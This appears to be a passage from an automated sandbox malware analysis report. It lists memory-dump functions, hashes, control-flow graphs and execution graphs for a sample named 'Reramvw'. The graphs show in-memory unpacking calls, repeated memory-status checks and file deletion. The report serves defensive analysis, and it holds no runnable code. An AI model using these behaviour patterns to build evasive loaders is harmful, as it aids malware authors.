                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2ee1817920b2f77317180e656702515855a0f873878071e8d2a84a177468539e
                                                                                • Instruction ID: 20cd9c6e73772f77a376b8e658ed7602963ba3a405261c47ba3fb0fafe0f70f2
                                                                                • Opcode Fuzzy Hash: 2ee1817920b2f77317180e656702515855a0f873878071e8d2a84a177468539e
                                                                                • Instruction Fuzzy Hash: 09012835B80204CFCB25DB78D858BAD7BB2EF88719F5040A9E4069B3A0CF34AD46CB41
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02EBD466 Relevance: .0, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 51aa931b67eb855d2b97e6136261c9eefd390cda49a4d94fcd99cfac018a96c0
                                                                                • Instruction ID: 32790152e1faf885156f1d274397118b649c6ffa02406a2b127091e3ee7ef8fc
                                                                                • Opcode Fuzzy Hash: 51aa931b67eb855d2b97e6136261c9eefd390cda49a4d94fcd99cfac018a96c0
                                                                                • Instruction Fuzzy Hash: BDF0B4B5940045AFDB05CBA8DC84EFBBBB8EBCA325B15C196E04887016C6349817C7B0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02EB1534 Relevance: .0, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 503acc6acfa010aa43abca041027c88bc3d7daea271409e150b85ca377324ee7
                                                                                • Instruction ID: e294eb79e1c4f9e75b4d31a28fc93c75e8ec4c547fc19fd1e6398dfb4d8c5352
                                                                                • Opcode Fuzzy Hash: 503acc6acfa010aa43abca041027c88bc3d7daea271409e150b85ca377324ee7
                                                                                • Instruction Fuzzy Hash: 4DF0F633A451508BC7238BA498A01EE7BA1EE58235718A0E7D80ADF212D725D402CB92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02EB8348 Relevance: .0, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3e61e183dc0530fc028959bd7c654389c640031ddbc4a991c446ed99a79a25fb
                                                                                • Instruction ID: da9d3356dd5a519c8120c5795f888b01347494e64d49affaf045041e4e9fec57
                                                                                • Opcode Fuzzy Hash: 3e61e183dc0530fc028959bd7c654389c640031ddbc4a991c446ed99a79a25fb
                                                                                • Instruction Fuzzy Hash: 38F0C930D401099FCB05EFB8F98599D7BBAEF40304F5046B9D409AB264EB396F1ACB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02EB6C24 Relevance: .0, Instructions: 12COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e843fd55f53f12185835c7a13ba6e13fcd5882971c3af34308f1da15e75d39e1
                                                                                • Instruction ID: ca115c23fbb6877b9662dc4e6334fb8bcd507082393493cc9588831e1162dc2d
                                                                                • Opcode Fuzzy Hash: e843fd55f53f12185835c7a13ba6e13fcd5882971c3af34308f1da15e75d39e1
                                                                                • Instruction Fuzzy Hash: 17C002363580508FC606A768E0644B977B6DFCA66932845AAE159CB762CE26A8029F44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02EBFF48 Relevance: .0, Instructions: 8COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 642a7aa0df6a1b72a510d2c53894cf898cbbf1ff50ce339079345b439131290d
                                                                                • Instruction ID: 3bf2b8c28080548a4e8be71bea9cee382c24f4448b1fb617838236871af4254f
                                                                                • Opcode Fuzzy Hash: 642a7aa0df6a1b72a510d2c53894cf898cbbf1ff50ce339079345b439131290d
                                                                                • Instruction Fuzzy Hash: 04B0923700010CAE8B01BB90E804C86BBADEB942407008062AA084A232DA22E668EBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:6.4%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:38
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph 8078 793ec0 8079 793ece 8078->8079 8080 793ed4 8079->8080 8086 79455e 8079->8086 8089 796e0e 8079->8089 8092 79686f 8079->8092 8096 794488 8079->8096 8099 794557 8079->8099 8088 79bad0 VirtualProtect 8086->8088 8087 79459b 8088->8087 8091 79bad0 VirtualProtect 8089->8091 8090 796e29 8091->8090 8095 79bad0 VirtualProtect 8092->8095 8093 79688c 8094 7945f1 8094->8092 8094->8093 8095->8094 8103 79c850 8096->8103 8100 79456a 8099->8100 8101 79459b 8100->8101 8102 79bad0 VirtualProtect 8100->8102 8102->8101 8106 79c878 8103->8106 8108 79c88b 8106->8108 8110 79c928 8108->8110 8111 79c968 VirtualAlloc 8110->8111 8113 7944a8 8111->8113 8057 5cd030 8058 5cd048 8057->8058 8059 5cd0a3 8058->8059 8061 79c2e0 8058->8061 8062 79c308 8061->8062 8065 79c610 8062->8065 8063 79c32f 8066 79c633 8065->8066 8069 79c6df 8066->8069 8070 79bad0 8066->8070 8069->8063 8072 79bae3 8070->8072 8074 79be98 8072->8074 8075 79bee0 VirtualProtect 8074->8075 8077 79bb66 8075->8077 8077->8063

                                                                                Executed Functions

                                                                                Function 0079BE98 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 855 79be98-79bf19 VirtualProtect 858 79bf1b-79bf21 855->858 859 79bf22-79bf47 855->859 858->859
                                                                                APIs
                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0079BF0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2326856367.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_790000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 2fff47f95271d8fd57390b579dd82a13962c602d7748063f0b2a1041d6b84617
                                                                                • Instruction ID: 040211c36be63c9c113527c1e693b12d6a9e4607f620622b2ef6ddc8e398a327
                                                                                • Opcode Fuzzy Hash: 2fff47f95271d8fd57390b579dd82a13962c602d7748063f0b2a1041d6b84617
                                                                                • Instruction Fuzzy Hash: 981106B1D002499FDB10DFAAD844AEEFBF5FF48310F10842AD419A7250C779A944CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0079C928 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 863 79c928-79c9a0 VirtualAlloc 866 79c9a9-79c9ce 863->866 867 79c9a2-79c9a8 863->867 867->866
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0079C993
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2326856367.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_790000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 22221d6088028b8db134cb79352a0d376546b234745ee703ffb084aff58284fb
                                                                                • Instruction ID: a2efe0bb7b0efb7db8dfdb8e8e15143e4ab5bd7b271a3bc47783deecb602d249
                                                                                • Opcode Fuzzy Hash: 22221d6088028b8db134cb79352a0d376546b234745ee703ffb084aff58284fb
                                                                                • Instruction Fuzzy Hash: 3E1137758002498FDF10DFAAD844AEEFFF5FF48320F148819D559A7250CB79A540CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 005CD030 Relevance: .1, Instructions: 74COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 929 5cd030-5cd042 930 5cd048 929->930 931 5cd0d3-5cd0da 929->931 932 5cd04a-5cd056 930->932 931->932 934 5cd05c-5cd07e 932->934 935 5cd0df-5cd0e4 932->935 936 5cd0e9-5cd0fe 934->936 937 5cd080-5cd09f call 79c2e0 934->937 935->934 941 5cd0b5-5cd0bd 936->941 940 5cd0a3-5cd0b3 937->940 940->941 942 5cd10b 940->942 943 5cd0bf-5cd0d0 941->943 944 5cd100-5cd109 941->944 944->943
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2325393437.00000000005CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005CD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5cd000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b59e1b60035c0879b00808e7f8a37c07fbe55e6b916db0bafb7fc6bd718168b2
                                                                                • Instruction ID: a885036f613a9463e82248fb79091d6baaa2044131fd5efcaa7ad7cef74ea918
                                                                                • Opcode Fuzzy Hash: b59e1b60035c0879b00808e7f8a37c07fbe55e6b916db0bafb7fc6bd718168b2
                                                                                • Instruction Fuzzy Hash: E121FF72504204DFCB15DF58D988F26BFB5FB88310F24857DE9099A246D33AD806CAB2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 005CD006 Relevance: .1, Instructions: 73COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 947 5cd006-5cd042 949 5cd048 947->949 950 5cd0d3-5cd0da 947->950 951 5cd04a-5cd056 949->951 950->951 953 5cd05c-5cd07e 951->953 954 5cd0df-5cd0e4 951->954 955 5cd0e9-5cd0fe 953->955 956 5cd080-5cd09f call 79c2e0 953->956 954->953 960 5cd0b5-5cd0bd 955->960 959 5cd0a3-5cd0b3 956->959 959->960 961 5cd10b 959->961 962 5cd0bf-5cd0d0 960->962 963 5cd100-5cd109 960->963 963->962
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2325393437.00000000005CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005CD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5cd000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7aaa711bda10bc39bc5559b21a8742c8b3e3120859a55a6397323aea6150f334
                                                                                • Instruction ID: 3779777e3b0c275e0d3aeb7c9b6af677efa80169ef54f23fd32ee6052255826f
                                                                                • Opcode Fuzzy Hash: 7aaa711bda10bc39bc5559b21a8742c8b3e3120859a55a6397323aea6150f334
                                                                                • Instruction Fuzzy Hash: 41213C754093C09FCB038F64D994B16BF71AB46210F1985EBD8858F2A7C339981ACBB2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06436B6D Relevance: .1, Instructions: 59COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 966 6436b6d-6436b80 967 6436b82 966->967 968 6436bf6-6436c8e 966->968 967->968 974 6436c9a-6436cb6 968->974 977 6430072-6430078 974->977 978 6436cbc-6436cbf 974->978 979 6430081-643dbaa 977->979 980 643007a-64376c2 977->980 978->977 980->977 988 64376c8-64376cd 980->988 988->977
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2340383107.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6430000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5331c291c52affa92db1a1da2089ae3d99d0e68ece49cf3f2b9852b479daddea
                                                                                • Instruction ID: 9a2acaf35a8056ab54a526ee96092b29c72c6cd18d67ebcbece76bf549cc0c9a
                                                                                • Opcode Fuzzy Hash: 5331c291c52affa92db1a1da2089ae3d99d0e68ece49cf3f2b9852b479daddea
                                                                                • Instruction Fuzzy Hash: 6521FB74A042648FCB55CF68C888A99BBF5FF49314F0445E9E849AB355CB34EE82CF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06431831 Relevance: .0, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2340383107.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6430000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 10c5da0fec479e8ce7d7dbdd8899a81227080dda70e0436cb02cfa645a2632df
                                                                                • Instruction ID: 504090beec39afccab80304b536acf3b47ddb28fd08a28f21cce3a570751cae6
                                                                                • Opcode Fuzzy Hash: 10c5da0fec479e8ce7d7dbdd8899a81227080dda70e0436cb02cfa645a2632df
                                                                                • Instruction Fuzzy Hash: 0801D338E082288FDB55DF28D859B99BBB1FB89700F0041A6E909A3341CB34AE80CF51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06432AB6 Relevance: .0, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2340383107.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6430000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e4ff2a8dd45da70a57e05da10bc08c7ba9ed558edff557f2c3f66d8c65fc6b77
                                                                                • Instruction ID: 3f571b8c0971e22627cbe3dd667e3e273e2ad58827525fe1d9f8a390b0658f20
                                                                                • Opcode Fuzzy Hash: e4ff2a8dd45da70a57e05da10bc08c7ba9ed558edff557f2c3f66d8c65fc6b77
                                                                                • Instruction Fuzzy Hash: 53019278A002298FDB54EF58D885B99BBF1FB48301F0081E5E949A3395DF345D81CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0643181D Relevance: .0, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2340383107.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6430000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4f5c852c284a7d1d33ffbd14936663c6e7ab17b161586a8828cd8ddff962b588
                                                                                • Instruction ID: e82be9c89809ce91969c21987849d886c43ae5768a250ca847cab86edc30eef5
                                                                                • Opcode Fuzzy Hash: 4f5c852c284a7d1d33ffbd14936663c6e7ab17b161586a8828cd8ddff962b588
                                                                                • Instruction Fuzzy Hash: 53F08C34C04234CFEB618F24E4543993BB1BB0EB91F0586F2D409A3341D7384D418F45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06434130 Relevance: .0, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2340383107.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6430000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 703973fd9357022b57552e3f68e025c9d2c0691255c4b83a2560768ddc845677
                                                                                • Instruction ID: adbb828dfad9790d5b267288ec153945b3db2b78bc1845055d04e9607721739b
                                                                                • Opcode Fuzzy Hash: 703973fd9357022b57552e3f68e025c9d2c0691255c4b83a2560768ddc845677
                                                                                • Instruction Fuzzy Hash: DAF0E774A041698FDB54EF58D88AB9DBBB5FB88704F0040E5E909A3355CB346E85CF10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06432A8F Relevance: .0, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2340383107.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6430000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b94303eddee178f063962b2daa2dc052d8ebb22f7fce6f1e35f26ac1d59ed8fd
                                                                                • Instruction ID: 78f1e2a38b3bee7582684536cf68c4a6fb44de8496cc72d92da000d0c10258e3
                                                                                • Opcode Fuzzy Hash: b94303eddee178f063962b2daa2dc052d8ebb22f7fce6f1e35f26ac1d59ed8fd
                                                                                • Instruction Fuzzy Hash: 69F0ED70A08168CFCB90EF58E8846DA7BF0BB0D720F0582E6D44CA7241CA309D818FC6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 064361E3 Relevance: .0, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2340383107.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6430000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 55cd9f5a7d965050fdd3b5c52ed7395a6c05985145051fdc1613cfa66121f5e0
                                                                                • Instruction ID: b1bbeab873ec43f5da30d5e05181a15c255b083be5c0ad69e9d197a924178fb6
                                                                                • Opcode Fuzzy Hash: 55cd9f5a7d965050fdd3b5c52ed7395a6c05985145051fdc1613cfa66121f5e0
                                                                                • Instruction Fuzzy Hash: 79D023344043155FE34097C4D445ED537B0D309330F014221B80AB3681DA5C5CC3CBE0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0643F970 Relevance: .0, Instructions: 11COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2340383107.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6430000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                • Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
                                                                                • Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                • Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:14%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:146
                                                                                Total number of Limit Nodes:14
                                                                                execution_graph 40370 2c90848 40372 2c9084e 40370->40372 40371 2c9091b 40372->40371 40376 6314438 40372->40376 40380 6314428 40372->40380 40384 2c91380 40372->40384 40377 6314447 40376->40377 40390 6313c74 40377->40390 40381 6314438 40380->40381 40382 6313c74 4 API calls 40381->40382 40383 6314468 40382->40383 40383->40372 40386 2c91396 40384->40386 40385 2c91490 40385->40372 40386->40385 40512 2c97319 40386->40512 40516 2c97440 40386->40516 40523 2c97328 40386->40523 40391 6313c7f 40390->40391 40394 63153d4 40391->40394 40393 6315dee 40393->40393 40395 63153df 40394->40395 40396 6316514 40395->40396 40398 63181a0 40395->40398 40396->40393 40399 63181c1 40398->40399 40400 63181e5 40399->40400 40404 6318350 40399->40404 40408 631834e 40399->40408 40412 6318349 40399->40412 40400->40396 40405 631835d 40404->40405 40407 6318396 40405->40407 40416 63162e0 40405->40416 40407->40400 40409 6318350 40408->40409 40410 6318396 40409->40410 40411 63162e0 4 API calls 40409->40411 40410->40400 40411->40410 40413 6318391 40412->40413 40414 63162e0 4 API calls 40413->40414 40415 6318396 40414->40415 40415->40400 40417 63162eb 40416->40417 40419 6318408 40417->40419 40420 6316e58 40417->40420 40419->40419 40421 6316e63 40420->40421 40427 6316e68 40421->40427 40423 6318477 40431 631d918 40423->40431 40440 631d900 40423->40440 40424 63184b1 40424->40419 40430 6316e73 40427->40430 40428 6319878 40428->40423 40429 63181a0 4 API calls 40429->40428 40430->40428 40430->40429 40433 631da49 40431->40433 40434 631d949 40431->40434 40432 631d955 40432->40424 40433->40424 40434->40432 40448 631db90 40434->40448 40452 631db80 40434->40452 40435 631d995 40457 631ee81 40435->40457 40466 631ee90 40435->40466 40441 631d918 40440->40441 40443 631d955 40441->40443 40444 631db90 3 API calls 40441->40444 40445 631db80 3 API calls 40441->40445 40442 631d995 40446 631ee81 2 API calls 40442->40446 40447 631ee90 2 API calls 40442->40447 40443->40424 40444->40442 40445->40442 40446->40443 40447->40443 40475 631dbe0 40448->40475 40484 631dbd0 40448->40484 40449 631db9a 40449->40435 40453 631db90 40452->40453 40455 631dbe0 2 API calls 40453->40455 40456 631dbd0 2 API calls 40453->40456 40454 631db9a 40454->40435 40455->40454 40456->40454 40458 631eebb 40457->40458 40493 631f3d0 40458->40493 40498 631f3e0 40458->40498 40459 631ef3e 40460 631cf90 GetModuleHandleW 40459->40460 40462 631ef6a 40459->40462 40461 631efae 40460->40461 40465 631fd65 CreateWindowExW 40461->40465 40465->40462 40467 631eebb 40466->40467 40473 631f3e0 GetModuleHandleW 40467->40473 40474 631f3d0 GetModuleHandleW 40467->40474 40468 631ef3e 40471 631ef6a 40468->40471 40503 631cf90 40468->40503 40473->40468 40474->40468 40476 631dbf1 40475->40476 40479 631dc14 40475->40479 40477 631cf90 GetModuleHandleW 40476->40477 40478 631dbfc 40477->40478 40478->40479 40483 631de6b GetModuleHandleW 40478->40483 40479->40449 40480 631dc0c 40480->40479 40481 631de18 GetModuleHandleW 40480->40481 40482 631de45 40481->40482 40482->40449 40483->40480 40485 631dbd5 40484->40485 40486 631cf90 GetModuleHandleW 40485->40486 40488 631dc14 40485->40488 40487 631dbfc 40486->40487 40487->40488 40492 631de6b GetModuleHandleW 40487->40492 40488->40449 40489 631dc0c 40489->40488 40490 631de18 GetModuleHandleW 40489->40490 40491 631de45 40490->40491 40491->40449 40492->40489 40494 631f40d 40493->40494 40495 631f48e 40494->40495 40496 631f550 GetModuleHandleW 40494->40496 40497 631f540 GetModuleHandleW 40494->40497 40496->40495 40497->40495 40499 631f40d 40498->40499 40500 631f48e 40499->40500 40501 631f550 GetModuleHandleW 40499->40501 40502 631f540 GetModuleHandleW 40499->40502 40501->40500 40502->40500 40504 631ddd0 GetModuleHandleW 40503->40504 40506 631de45 40504->40506 40507 631fd65 40506->40507 40508 631fd69 40507->40508 40509 631fd9d CreateWindowExW 40507->40509 40508->40471 40511 631fed4 40509->40511 40511->40511 40514 2c97328 40512->40514 40513 2c974aa 40513->40386 40514->40513 40527 632e33f 40514->40527 40517 2c9744a 40516->40517 40519 2c97464 40517->40519 40520 632c450 3 API calls 40517->40520 40536 632c441 40517->40536 40518 2c974aa 40518->40386 40519->40518 40522 632e33f 3 API calls 40519->40522 40520->40519 40522->40518 40525 2c9733e 40523->40525 40524 2c974aa 40524->40386 40525->40524 40526 632e33f 3 API calls 40525->40526 40526->40524 40528 632e34a 40527->40528 40531 632c450 40528->40531 40530 632e351 40530->40513 40532 632c465 40531->40532 40533 632c67a 40532->40533 40534 632ca60 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40532->40534 40535 632caa8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40532->40535 40533->40530 40534->40532 40535->40532 40538 632c450 40536->40538 40537 632c67a 40537->40519 40538->40537 40539 632caa8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40538->40539 40540 632ca60 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40538->40540 40539->40538 40540->40538 40541 2c97268 40542 2c972ae DeleteFileW 40541->40542 40544 2c972e7 40542->40544 40545 631e038 40546 631e080 LoadLibraryExW 40545->40546 40547 631e07a 40545->40547 40548 631e0b1 40546->40548 40547->40546 40549 6315788 DuplicateHandle 40550 631581e 40549->40550

                                                                                Executed Functions

                                                                                Function 0631DBE0 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3036 631dbe0-631dbef 3037 631dbf1-631dbfe call 631cf90 3036->3037 3038 631dc1b-631dc1f 3036->3038 3043 631dc00-631dc0e call 631de6b 3037->3043 3044 631dc14 3037->3044 3039 631dc21-631dc2b 3038->3039 3040 631dc33-631dc74 3038->3040 3039->3040 3047 631dc81-631dc8f 3040->3047 3048 631dc76-631dc7e 3040->3048 3043->3044 3054 631dd50-631de10 3043->3054 3044->3038 3050 631dc91-631dc96 3047->3050 3051 631dcb3-631dcb5 3047->3051 3048->3047 3052 631dca1 3050->3052 3053 631dc98-631dc9f call 631cf9c 3050->3053 3055 631dcb8-631dcbf 3051->3055 3057 631dca3-631dcb1 3052->3057 3053->3057 3087 631de12-631de15 3054->3087 3088 631de18-631de43 GetModuleHandleW 3054->3088 3058 631dcc1-631dcc9 3055->3058 3059 631dccc-631dcd3 3055->3059 3057->3055 3058->3059 3061 631dce0-631dce9 call 6316144 3059->3061 3062 631dcd5-631dcdd 3059->3062 3067 631dcf6-631dcfb 3061->3067 3068 631dceb-631dcf3 3061->3068 3062->3061 3070 631dd19-631dd26 3067->3070 3071 631dcfd-631dd04 3067->3071 3068->3067 3077 631dd49-631dd4f 3070->3077 3078 631dd28-631dd46 3070->3078 3071->3070 3072 631dd06-631dd16 call 631bb00 call 631cfac 3071->3072 3072->3070 3078->3077 3087->3088 3089 631de45-631de4b 3088->3089 3090 631de4c-631de60 3088->3090 3089->3090
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250760567.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6310000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: a2babe7f2da8ff16380c0c1b33da544ee84ab477232a3bc2e977047053e51bf9
                                                                                • Instruction ID: b506662f02a363da7d86ac81936a39ad33bedd55fb79b418f19a955fd73c1c95
                                                                                • Opcode Fuzzy Hash: a2babe7f2da8ff16380c0c1b33da544ee84ab477232a3bc2e977047053e51bf9
                                                                                • Instruction Fuzzy Hash: 37711470A00B059FD7A8DF2AD44079ABBF5FF89300F008A2DD45ADBA50DB75E949CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0631FD65 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                APIs
